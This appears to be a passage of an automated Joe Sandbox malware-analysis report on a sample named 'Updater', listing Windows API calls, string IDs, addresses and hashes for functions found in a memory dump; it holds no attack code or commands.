                                                                                                                                                    • Opcode ID: 3466b752e81ffa819aa8c179a89a94246ac9093491108f1bcd9d884c2c79674d
                                                                                                                                                    • Instruction ID: 75f63c3fa7059698cb2e2c0e48ede8ad4c90fb27ba97e4d642124b499311879e
                                                                                                                                                    • Opcode Fuzzy Hash: 3466b752e81ffa819aa8c179a89a94246ac9093491108f1bcd9d884c2c79674d
                                                                                                                                                    • Instruction Fuzzy Hash: 9D8190725042059BCF20EF54C884A7EB3E8FF8A310F1858AAF989DB251DB75E945CB53
                                                                                                                                                    APIs
                                                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00BA1186
                                                                                                                                                    • inet_addr.WSOCK32(?), ref: 00BA11E6
                                                                                                                                                    • gethostbyname.WSOCK32(?), ref: 00BA11F2
                                                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 00BA1200
                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BA1290
                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BA12AF
                                                                                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00BA1383
                                                                                                                                                    • WSACleanup.WSOCK32 ref: 00BA1389
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                    • String ID: Ping
                                                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                                                    • Opcode ID: bf046e650bc804c32f0382fedf88e5453af50b6dfdc50b120ff769902d0f4e64
                                                                                                                                                    • Instruction ID: 017dc3b9a0a8fed73129a494cadc4d8564a8adb2a699f80a9ba3753273884940
                                                                                                                                                    • Opcode Fuzzy Hash: bf046e650bc804c32f0382fedf88e5453af50b6dfdc50b120ff769902d0f4e64
                                                                                                                                                    • Instruction Fuzzy Hash: 0C91B270608201AFD760DF19C888F1ABBE4EF46318F1489E9F5699B7A2C734ED41CB91
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00BA42F1
                                                                                                                                                    • CoUninitialize.OLE32 ref: 00BA42FB
                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00BC0B2C,?), ref: 00BA4367
                                                                                                                                                    • IIDFromString.OLE32(00000000,?), ref: 00BA43D8
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00BA447B
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00BA44CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                    • API String ID: 636576611-1287834457
                                                                                                                                                    • Opcode ID: 151d97fb4ec786a94d6752fbd617b1674a2e3946e3f9f6e6dc86c2523d95ef20
                                                                                                                                                    • Instruction ID: 0100665095f2113d78710d92562c7a2147a310e03f5b5f6f3aa7a4146cd55c91
                                                                                                                                                    • Opcode Fuzzy Hash: 151d97fb4ec786a94d6752fbd617b1674a2e3946e3f9f6e6dc86c2523d95ef20
                                                                                                                                                    • Instruction Fuzzy Hash: EC71BD30208300DFCB20DF14D888B6EBBE4EF8A715F144899F9859B261DBB4ED49CB56
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                    • API String ID: 707087890-567219261
                                                                                                                                                    • Opcode ID: 7c0fcda8b9a45e13bf9e5207dc9b3221020b6a25268693fb40a913d55a404f46
                                                                                                                                                    • Instruction ID: fa0fc3bfec52f3c888d9ae51bef0b9ff14f8a97fc87cf22df49e5bce42344f78
                                                                                                                                                    • Opcode Fuzzy Hash: 7c0fcda8b9a45e13bf9e5207dc9b3221020b6a25268693fb40a913d55a404f46
                                                                                                                                                    • Instruction Fuzzy Hash: 93510435A081129BCF149F6CC8815BE73F6EF97750F1086ADE82997395EB32AD01D790
                                                                                                                                                    APIs
                                                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF), ref: 00B94189
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B941AA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadString$_wcslen
                                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                    • API String ID: 4099089115-3080491070
                                                                                                                                                    • Opcode ID: 87772f28e78e0e0aa2d2a5bfbca5dabd11e26668001bb2955d15cd97cf2fa525
                                                                                                                                                    • Instruction ID: 7421ba5699ba854d12f2b288888ad9d594cc5a88e1167d98d5a04e86474d44da
                                                                                                                                                    • Opcode Fuzzy Hash: 87772f28e78e0e0aa2d2a5bfbca5dabd11e26668001bb2955d15cd97cf2fa525
                                                                                                                                                    • Instruction Fuzzy Hash: BD515B7190021AAADF14EBE0DD82EFEB7F9AF08300F1045F5B509620A2EB356F59DB51
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                    • API String ID: 1256254125-769500911
                                                                                                                                                    • Opcode ID: 31e9265f0e01263bc19e5488c353ec4f78769ce0d8c12825768a367c9757c4be
                                                                                                                                                    • Instruction ID: bb53b4b97be4aeff8064b51f333cbea0d490c8c63d5be90fe9bb9d78fd196606
                                                                                                                                                    • Opcode Fuzzy Hash: 31e9265f0e01263bc19e5488c353ec4f78769ce0d8c12825768a367c9757c4be
                                                                                                                                                    • Instruction Fuzzy Hash: 4D31F4F6E0012147CF207B6C98525FA7BE5EB75310B1880EADD0687324FB71AD42CB65
                                                                                                                                                    APIs
                                                                                                                                                    • CreateMenu.USER32 ref: 00BB4622
                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00BB4631
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB46BE
                                                                                                                                                    • IsMenu.USER32(?), ref: 00BB46D2
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00BB46DC
                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BB4709
                                                                                                                                                    • DrawMenuBar.USER32 ref: 00BB4711
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                    • String ID: 0$F
                                                                                                                                                    • API String ID: 161812096-3044882817
                                                                                                                                                    • Opcode ID: e4466d3bd6d51861410d06b8108c97100a7e0829ca6daa1e2afff72f339efef6
                                                                                                                                                    • Instruction ID: c1f94613d86841c04e8f32a8ed4d12f937fda3aa2fae883069a806134b9739ae
                                                                                                                                                    • Opcode Fuzzy Hash: e4466d3bd6d51861410d06b8108c97100a7e0829ca6daa1e2afff72f339efef6
                                                                                                                                                    • Instruction Fuzzy Hash: 41416978A01209AFDB24CFA5E884AEA7BF5FF0A354F1401A8FD4697351DBB0AD10CB50
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                      • Part of subcall function 00B84D36: GetClassNameW.USER32(?,?,000000FF), ref: 00B84D59
                                                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00B83015
                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00B83020
                                                                                                                                                    • GetParent.USER32 ref: 00B8303C
                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B8303F
                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00B83048
                                                                                                                                                    • GetParent.USER32(?), ref: 00B8305C
                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B8305F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 711023334-1403004172
                                                                                                                                                    • Opcode ID: c7fe2eb6ff9478e749d4ebcd387ab18d1ef77efe833a3532644a1687eb9c7dac
                                                                                                                                                    • Instruction ID: bf80b38bceee8947eaaaec19f427ad748da69323397b35a149be33829d64a94c
                                                                                                                                                    • Opcode Fuzzy Hash: c7fe2eb6ff9478e749d4ebcd387ab18d1ef77efe833a3532644a1687eb9c7dac
                                                                                                                                                    • Instruction Fuzzy Hash: 1C21F574A00218BBCF10EBA0DC95EFEBBF5EF15710F0042A6B955532A1EB794904DB60
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                      • Part of subcall function 00B84D36: GetClassNameW.USER32(?,?,000000FF), ref: 00B84D59
                                                                                                                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00B830F6
                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00B83101
                                                                                                                                                    • GetParent.USER32 ref: 00B8311D
                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B83120
                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00B83129
                                                                                                                                                    • GetParent.USER32(?), ref: 00B8313D
                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B83140
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 711023334-1403004172
                                                                                                                                                    • Opcode ID: 96f6ef280283d8a5f85ff5577bf32e00100745c53eb61d584e1ae4e6f0232df6
                                                                                                                                                    • Instruction ID: a7de18abd5ad03940fdef694fd953b4dfbdf0637ec9f96c02a9ee470713dc13e
                                                                                                                                                    • Opcode Fuzzy Hash: 96f6ef280283d8a5f85ff5577bf32e00100745c53eb61d584e1ae4e6f0232df6
                                                                                                                                                    • Instruction Fuzzy Hash: F721C574A00114BBCF10FBA0DC85AFEBBF9EF15B10F0041A6B955631A1DB794908DB60
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BB443F
                                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BB4442
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00BB4469
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BB448C
                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BB4504
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                                    • Opcode ID: 53184a9b26f5df4a25f55362c185eeabfc50a06d52b45aa1b12ea9096cd68b71
                                                                                                                                                    • Instruction ID: 798ef90edca9a677d6ade6ec5dfa1ded8bf23d8a5ae0de5bed8292af6a58a2d2
                                                                                                                                                    • Opcode Fuzzy Hash: 53184a9b26f5df4a25f55362c185eeabfc50a06d52b45aa1b12ea9096cd68b71
                                                                                                                                                    • Instruction Fuzzy Hash: 50614875900208AFDB20DF68CC81EFE77F8EB09704F1441A9FA15A72A2D7B0A945DB60
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$FreeHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2929853658-0
                                                                                                                                                    • Opcode ID: e79497d7e2ff3c1e4f6f83fd9a53af54df283e9dc91f770122a3018282a9f19a
                                                                                                                                                    • Instruction ID: 7517a7c7d21a5b22ded70884aa75158002d843ea1b3d2325699f3dca8ee90316
                                                                                                                                                    • Opcode Fuzzy Hash: e79497d7e2ff3c1e4f6f83fd9a53af54df283e9dc91f770122a3018282a9f19a
                                                                                                                                                    • Instruction Fuzzy Hash: 8F11777A505188BFCF05EF58C952ED93BA5EF09351F5141E5BE084B122DA31DE54EB40
                                                                                                                                                    APIs
                                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B29501
                                                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00B295A0
                                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 00B29787
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00B68D83
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00B68DE8
                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B68E15
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                    • String ID: close all
                                                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                                                    • Opcode ID: ea76eac24e3eceb289e90a1dcea84913b0909a8eaa22284eb8a8af5be5a2065a
                                                                                                                                                    • Instruction ID: a964775922d6d04c30d21ffd53dbfb50b782b9a9d965a2b19b4ce95723b2cbc4
                                                                                                                                                    • Opcode Fuzzy Hash: ea76eac24e3eceb289e90a1dcea84913b0909a8eaa22284eb8a8af5be5a2065a
                                                                                                                                                    • Instruction Fuzzy Hash: 7CD12571601222CFCB29EF14D499A69F7E1EF18710F1146EDE90EAB261DB35AC12CF90
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                    • CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,REMOVE), ref: 00B8C5C8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CompareString_wcslen
                                                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                    • API String ID: 1025422365-769500911
                                                                                                                                                    • Opcode ID: 93c8a3eb9c431f053044237b13099b26ebf80b2d7d5f404369ff4172da75c897
                                                                                                                                                    • Instruction ID: bd83adf6e3f4043156bc0c8809153d92fd714d19d43801b39a9618a9056b29b4
                                                                                                                                                    • Opcode Fuzzy Hash: 93c8a3eb9c431f053044237b13099b26ebf80b2d7d5f404369ff4172da75c897
                                                                                                                                                    • Instruction Fuzzy Hash: 76915CB16083429FCB10EF14D885E6ABBE5FF98714F0049ADF5999B2A1E770DD04CB62
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00B35881
                                                                                                                                                      • Part of subcall function 00B345EE: GetClientRect.USER32(?,?), ref: 00B34614
                                                                                                                                                      • Part of subcall function 00B345EE: GetWindowRect.USER32(?,?), ref: 00B34655
                                                                                                                                                      • Part of subcall function 00B345EE: ScreenToClient.USER32(?,?), ref: 00B3467D
                                                                                                                                                    • GetDC.USER32 ref: 00B79A62
                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B79A75
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00B79A83
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00B79A98
                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00B79AA0
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B79B31
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                    • String ID: U
                                                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                                                    • Opcode ID: 9a0a162aa79ecbb91ba7caa19f1218a6d1dae1749d0665cef3a6fc0b80168a91
                                                                                                                                                    • Instruction ID: f97bf98003c28e742364348646d560866c76ef9feb8e35292bab93ef6ea90a94
                                                                                                                                                    • Opcode Fuzzy Hash: 9a0a162aa79ecbb91ba7caa19f1218a6d1dae1749d0665cef3a6fc0b80168a91
                                                                                                                                                    • Instruction Fuzzy Hash: 3271B031900209DFCF258F68D885AFA7BF5FF49320F2482A9ED699B2A5D7319D40DB50
                                                                                                                                                    APIs
                                                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B943A0
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 00B943C6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
